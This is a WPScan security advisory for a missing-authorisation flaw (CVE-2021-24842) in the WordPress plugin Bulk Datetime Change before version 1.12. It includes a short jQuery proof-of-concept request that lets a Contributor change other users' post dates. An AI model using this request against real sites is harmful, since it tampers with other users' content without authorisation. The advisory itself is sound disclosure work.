WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Bulk Datetime Change < 1.12 - Missing Authorisation

Description

The plugin does not enforce capability checks which allows users with Contributor roles to 1) list private post titles of other users and 2) change the posted date of other users' posts.

Proof of Concept

Run on "Bulk Datetime Change" page:

jQuery.post("https://example.com/wp-admin/admin.php?page=bulkdatetimechange",{
  bulk_datetime_change_update: jQuery("#bulk_datetime_change_update").attr("value"),
  "bulk_date_check[]": "509",
  "bulk_date_update[509]": "2021-09-23+12:11:40",
  "bulk-datetime-change-update1": "1"
}) 

Affects Plugins

bulk-datetime-change
Fixed in version 1.12

References

CVE
CVE-2021-24842
URL
https://plugins.trac.wordpress.org/changeset/2618982

Classification

Type

ACCESS CONTROLS

OWASP top 10
A5: Broken Access Control
CWE
CWE-284

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID
054bd981-dbdd-47dd-bad0-fa327e5860a2

Timeline

Publicly Published

2021-10-26 (about 1 years ago)

Added

2021-10-26 (about 1 years ago)

Last Updated

2022-04-08 (about 9 months ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us